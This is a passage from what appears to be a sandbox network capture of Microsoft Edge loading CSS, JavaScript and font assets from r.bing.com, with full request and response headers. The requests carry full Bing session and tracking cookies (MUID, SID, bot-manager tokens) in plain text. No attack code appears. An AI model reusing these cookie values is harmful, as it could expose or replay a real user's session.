bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1

Response

HTTP/1.1 200 OK

Content-Length: 65
Content-Type: text/css
Content-Encoding: br
Content-MD5: Lp41RtKlF+oNsu3kLm8fTg==
Last-Modified: Tue, 24 Sep 2024 06:42:37 GMT
ETag: 0x8DCDC641454C744
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 0d253c1c-901e-0072-14d2-149bae000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=164976
Expires: Mon, 07 Oct 2024 13:55:25 GMT
Date: Sat, 05 Oct 2024 16:05:49 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144349.f099b73
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/pVQ8VyPW8DMdPUXdndzLmc8yWp4.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/pVQ8VyPW8DMdPUXdndzLmc8yWp4.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1

Response

HTTP/1.1 200 OK

Content-Length: 646
Content-Type: text/css; charset=utf-8
Content-Encoding: br
Content-MD5: 4X/uk1b74DKrOYf1NPidNw==
Last-Modified: Tue, 24 Sep 2024 07:01:37 GMT
ETag: 0x8DCDC66BB8AA23F
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: bb7961cb-e01e-0032-6dfa-14b240000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=182265
Expires: Mon, 07 Oct 2024 18:43:34 GMT
Date: Sat, 05 Oct 2024 16:05:49 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144349.f0a1f7b
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/9QVAd0uprTCf6QvhFRBK-cLsJ44.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/9QVAd0uprTCf6QvhFRBK-cLsJ44.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1

Response

HTTP/1.1 200 OK

Content-Length: 128
Content-Type: text/css
Content-Encoding: br
Content-MD5: 7oi8QzDYA9q2BYjZVfOFdg==
Last-Modified: Tue, 24 Sep 2024 05:54:58 GMT
ETag: 0x8DCDC5D6C01D24A
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 9c0e7de6-101e-002c-63a7-1668ad000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=366448
Expires: Wed, 09 Oct 2024 21:53:18 GMT
Date: Sat, 05 Oct 2024 16:05:50 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144350.f0a2092
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/IlGx5JyQLSR5amBY1qzAWL3z-LI.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/IlGx5JyQLSR5amBY1qzAWL3z-LI.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1

Response

HTTP/1.1 200 OK

Content-Length: 10
Content-Type: text/css; charset=utf-8
Content-Encoding: br
Content-MD5: Bb6S1Qp/ZCNoN+Xn6ZVoCw==
Last-Modified: Tue, 24 Sep 2024 06:09:35 GMT
ETag: 0x8DCDC5F7732C5D7
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 0106e435-301e-003b-6453-15a8ce000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=220202
Expires: Tue, 08 Oct 2024 05:15:52 GMT
Date: Sat, 05 Oct 2024 16:05:50 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144350.f0a2220
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/nmmBy6yVoFq1jGrAy2mcAhHTx1I.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/nmmBy6yVoFq1jGrAy2mcAhHTx1I.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1

Response

HTTP/1.1 200 OK

Content-Length: 107
Content-Type: text/css
Content-Encoding: br
Content-MD5: huEyGJXokjwjNF23GOYL0A==
Last-Modified: Tue, 24 Sep 2024 06:58:33 GMT
ETag: 0x8DCDC664E517677
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 5880800e-901e-0050-18d4-14f598000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=165873
Expires: Mon, 07 Oct 2024 14:10:23 GMT
Date: Sat, 05 Oct 2024 16:05:50 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144350.f0a2372
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/d9TRXXZEoyyMfHxWr0fybsRFV_g.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/d9TRXXZEoyyMfHxWr0fybsRFV_g.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
Origin: https://www.bing.com
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
DNT: 1
Accept: */*
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: script
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 8968
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: UTpH1lFBKzcqJxI0vvIBLA==
Last-Modified: Thu, 04 Jul 2024 20:15:19 GMT
ETag: 0x8DC9C6606A5C428
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 9af3ff6f-401e-0094-5158-d1b3c5000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=99564
Expires: Sun, 06 Oct 2024 19:44:52 GMT
Date: Sat, 05 Oct 2024 16:05:28 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144328.f0972c6
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/sa/simg/Roboto_Semibold.woff2

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /sa/simg/Roboto_Semibold.woff2 HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
Origin: https://www.bing.com
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
DNT: 1
Accept: */*
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: font
Referer: https://r.bing.com/rs/5W/2VH/cir3,cc,nc/1KKUBDl-P5UnnMr4CFdIc4245kE.css?or=w
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 404 Not Found

Accept-Ranges: bytes
Content-Length: 10
Server: AkamaiNetStorage
Date: Sat, 05 Oct 2024 16:05:30 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144330.f0972ec
GET

https://r.bing.com/rs/6s/fU/jnc,nj/tlifxqsNyCzxIJnRwtQKuZToQQw.js?or=w

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rs/6s/fU/jnc,nj/tlifxqsNyCzxIJnRwtQKuZToQQw.js?or=w HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 5
Content-Type: application/x-javascript; charset=utf-8
Server: Kestrel
Access-Control-Allow-Headers: *
Access-Control-Allow-Origin: *
Content-Encoding: br
Last-Modified: Sun, 29 Sep 2024 05:08:28 GMT
X-EventID: 66fa9406e613483eb25dd1f48b7e1bc5
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
X-AS-InstrumentationOptions: AppServerLoggingMaster=1
X-AS-MACHINENAME: DUBEEAP0000E034
X-AS-SuppressSetCookie: 1
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-2hCuCd/1fLr9PPxEifW5iPqn4EeOzPHvNBZJtz1X+5g='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingrms"}]}
cross-origin-resource-policy: cross-origin
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.75}
Cache-Control: public, max-age=229582
Expires: Tue, 08 Oct 2024 07:51:52 GMT
Date: Sat, 05 Oct 2024 16:05:30 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144330.f097f1e
Timing-Allow-Origin: *
GET

https://r.bing.com/rp/yt5G3936XbeOUUYvhktH-Zp37Ac.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/yt5G3936XbeOUUYvhktH-Zp37Ac.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 62
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: 56QwnVmnkrKOlc26EzLhyw==
Last-Modified: Tue, 24 Sep 2024 07:15:45 GMT
ETag: 0x8DCDC68B529586E
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 5e20285c-e01e-0039-6862-15aa34000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=226914
Expires: Tue, 08 Oct 2024 07:07:24 GMT
Date: Sat, 05 Oct 2024 16:05:30 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144330.f09806a
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/qwce00QJxdHzNxXh5H1mBc8QgBU.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/qwce00QJxdHzNxXh5H1mBc8QgBU.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 181
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: v9w4V2ItZPq2nYGNSEmAzA==
Last-Modified: Tue, 24 Sep 2024 07:03:23 GMT
ETag: 0x8DCDC66FAE00DFD
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 92f640fd-401e-0034-583c-164538000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=320288
Expires: Wed, 09 Oct 2024 09:03:39 GMT
